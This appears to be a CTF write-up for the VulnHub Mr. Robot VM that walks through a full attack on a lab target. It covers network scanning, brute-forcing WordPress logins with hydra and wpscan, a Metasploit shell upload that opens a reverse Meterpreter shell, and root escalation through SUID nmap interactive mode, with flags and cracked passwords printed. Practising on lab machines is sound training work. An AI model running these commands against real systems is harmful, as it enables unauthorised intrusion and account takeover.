Hello, and welcome to my VulnHub VM Write-Ups!
Before we begin, you must setup your VM. You can download it from here!!
Ok Then! If you are all set – Let’s Begin! and get our hands dirty with this CTF.
Description:
This VM ha three keys hidden in different locations. Our goal is to find all three of them.
This VM is considered beginner-intermediate level. No Advance exploitation needed or reverse engineering.
Let the Hacking Begin!
First we need the IP of the VM. For this we use netdiscover
root@kali:~# netdiscover
Currently scanning: Finished! | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 84
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.2 [......!!!....] 1 42 Honda Electronics Co.,Ltd
192.168.1.1 [......!!!....] 1 42 PCS Systemtechnik GmbH
Ok! The IP 192.168.1.1 will be our target. Now let’s check Ports which are open with nmap.
root@kali:~# nmap -sS -O -A -n 192.168.1.1
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 21:37 IST
Nmap scan report for 192.168.1.1
Host is up (0.00058s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
MAC Address: 08:00:27:AD:C9:10 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.1.1
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.27 seconds
We can see that Ports 80 and 443 are open.Yhey seem to run Apache HTTPD, which is an open source HTTP server.
Since, We know that this is a web server. Let’s run nikto to scan vulnerabilities.
root@kali:~# nikto -h 192.168.1.1
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.1
+ Target Hostname: 192.168.1.1
+ Target Port: 80
+ Start Time: 2019-02-18 20:45:21 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.1.1/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2019-02-18 20:55:33 (GMT5.5) (612 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Ok! What We found from the scan.
- robots.txt
- /admin/index.html
- /admin/index.php
- /wp-login/
- /wordpress/
- /wp-admin/wp-login.php
- /blog/wp-login.php
- /wp-login.php
Let’s open the website in our web browser by navigating to 192.168.1.1. We will find that we can run six commands. Having FUN!!, let’s navigate to http://192.168.1.1/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
Cool!! First the key! Navigate to http://192.168.1.1/key-1-of-3.txt
Flag 1:
073403c8a58a1f80d943455fb30724b9
Let’s go ahead and navigate to http://192.168.1.1/fsocity.dic, and save the file in our local machine.
root@kali:~# wc -l fsocity.dic
858160 fsocity.dic
root@kali:~# sort -u fsocity.dic | wc -l
11451
root@kali:~# sort -u fsocity.dic > fsocity_sorted.dic
root@kali:~# sort -u fsocity_sorted.dic | wc -l
11451
Now we will use hydra, a online password cracker.
First we Brute Force the username with password test.
hydra -L fsocity_sorted.dic -p test 192.168.1.1 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.1%2Fwp-admin%2F&testcookie=1:Invalid username" -t 50 -f -V
[ATTEMPT] target 192.168.1.1 - login "encrypted" - pass "test" - 5522 of 11452 [child 18] (0/0)
[80][http-post-form] host: 192.168.1.1 login: elliot password: test
[STATUS] attack finished for 192.168.1.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-02-18 22:54:26
We can see that we got a username “elliot”. Let’s Brute force the password for this user
wpscan --log --batch --url 10.0.2.7 --wordlist ${PWD}/fsocity_sorted.dic --username elliot --threads 20
[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
[+] Starting the password brute forcer
[+] [SUCCESS] Login : elliot Password : ER28-0652
Brute Forcing 'elliot' Time: 00:04:58 < > (5633 / 11452) 49.18% ETA: 00:05:09
+----+--------+------+-----------+
| ID | Login | Name | Password |
+----+--------+------+-----------+
| | elliot | | ER28-0652 |
+----+--------+------+-----------+
[+] Finished: Mon Feb 18 23:02:39 2019
[+] Elapsed time: 00:05:17
[+] Requests made: 6026
[+] Memory used: 23.734 MB
Try the username and password in http://192.168.1.1/wp-login.php. We got admin access.
With the username and the password we have, let’s dive into metasploit.
root@kali:~/Projects# msfconsole
=[ metasploit v4.17.3-dev ]
+ -- --=[ 1797 exploits - 1019 auxiliary - 310 post ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 WordPress
msf exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME elliot
USERNAME => elliot
msf exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD ER28-0652
PASSWORD => ER28-0652
msf exploit(unix/webapp/wp_admin_shell_upload) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
Seeing the error
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
We can edit the source code of the exploit. So that it will not fail upon detecting WordPress.
root@kali:~# gedit /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
We will comment out the line which is creating error.
def exploit
#fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
Now back to metasploit, and reload the modules and run the exploit again.
msf exploit(unix/webapp/wp_admin_shell_upload) > reload
[*] Reloading module...
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Authenticating with WordPress using elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/hHvqzHOUXl/CEMrloSQsY.php...
[*] Sending stage (37775 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.1:45320) at 2019-02-18 23:40:28 +0530
[!] This exploit may require manual cleanup of 'CEMrloSQsY.php' on the target
[!] This exploit may require manual cleanup of 'hHvqzHOUXl.php' on the target
[!] This exploit may require manual cleanup of '../hHvqzHOUXl' on the target
meterpreter >
Great!! We got the shell running on the host. Let’s enumerate
meterpreter > pwd
/opt/bitnami/apps/wordpress/htdocs/wp-content/plugins/hHvqzHOUXl
meterpreter > cd /
meterpreter > dir
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-09-16 16:19:06 +0530 bin
40755/rwxr-xr-x 4096 dir 2015-11-13 14:22:43 +0530 boot
40755/rwxr-xr-x 3820 dir 2019-02-19 01:11:45 +0530 dev
40755/rwxr-xr-x 4096 dir 2019-02-19 01:11:47 +0530 etc
40755/rwxr-xr-x 4096 dir 2015-11-13 11:55:35 +0530 home
100644/rw-r--r-- 5582759 fil 2015-11-13 14:22:43 +0530 initrd.img
40755/rwxr-xr-x 4096 dir 2015-09-16 16:19:06 +0530 lib
40755/rwxr-xr-x 4096 dir 2015-09-16 16:19:06 +0530 lib64
40700/rwx------ 16384 dir 2015-06-24 16:14:49 +0530 lost+found
40755/rwxr-xr-x 4096 dir 2015-09-16 16:19:06 +0530 media
40755/rwxr-xr-x 4096 dir 2015-11-13 14:22:20 +0530 mnt
40755/rwxr-xr-x 4096 dir 2015-09-16 16:19:06 +0530 opt
40555/r-xr-xr-x 0 dir 2019-02-18 19:41:41 +0530 proc
40700/rwx------ 4096 dir 2015-11-14 05:20:07 +0530 root
40755/rwxr-xr-x 480 dir 2019-02-18 19:42:39 +0530 run
40755/rwxr-xr-x 4096 dir 2015-11-13 14:22:14 +0530 sbin
40755/rwxr-xr-x 4096 dir 2015-09-16 16:19:06 +0530 srv
40555/r-xr-xr-x 0 dir 2019-02-19 01:11:33 +0530 sys
41777/rwxrwxrwx 4096 dir 2019-02-18 23:40:18 +0530 tmp
40755/rwxr-xr-x 4096 dir 2015-09-16 16:19:06 +0530 usr
40755/rwxr-xr-x 4096 dir 2015-09-16 16:19:06 +0530 var
100600/rw------- 5821984 fil 2015-09-16 16:19:06 +0530 vmlinuz
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 12:50:08 +0530 robot
meterpreter > cd robot
meterpreter > ls -la
Listing: /home/robot
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 12:58:21 +0530 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 12:58:21 +0530 password.raw-md5
meterpreter > cat key-2-of-3.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
This is a MD5 Hash with username robot. We go to HashKiller to decrypt it.
abcdefghijklmnopqrstuvwxyz
We have the password. Let’s move forward..and get back to the meterpreter session.
meterpreter > shell
Process 2296 created.
Channel 1 created.
Okay! Let’s establish s TTY Shell here by typing the following code
python -c 'import pty; pty.spawn("/bin/sh")'
Now let’s login as robot.
Flag 2:
$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Now only the root directory is left. To access this folder we somehow need to gain root access on the system. Let’s search for setuid files that might be exploitable.
robot@linux:/tmp$ find / -perm +6000 2> /dev/null
find / -perm +6000 2> /dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/declaration
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/ca-certificates
/usr/local/share/sgml
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/misc
/usr/local/share/sgml/entities
/usr/local/share/fonts
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/lib/python3.4
/usr/local/lib/python3.4/dist-packages
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
/var/local
/var/lib/libuuid
/var/mail
/sbin/unix_chkpwd
We can see that nmap is installed on the target system. Let’s check the nmap version.
robot@linux:/$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
This is an old version of nmap, which supports an option called “interactive”.
robot@linux:/$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> ! id
! id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap> ! whoami
! whoami
root
waiting to reap child : No child processes
nmap> !sh
!sh
# cd /root
cd /root
# ls -la
ls -la
total 32
drwx------ 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
-rw------- 1 root root 4058 Nov 14 2015 .bash_history
-rw-r--r-- 1 root root 3274 Sep 16 2015 .bashrc
drwx------ 2 root root 4096 Nov 13 2015 .cache
-rw-r--r-- 1 root root 0 Nov 13 2015 firstboot_done
-r-------- 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw------- 1 root root 1024 Sep 16 2015 .rnd
Flag 3:
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Please say that “You are seeing it too!”.
Leave a comment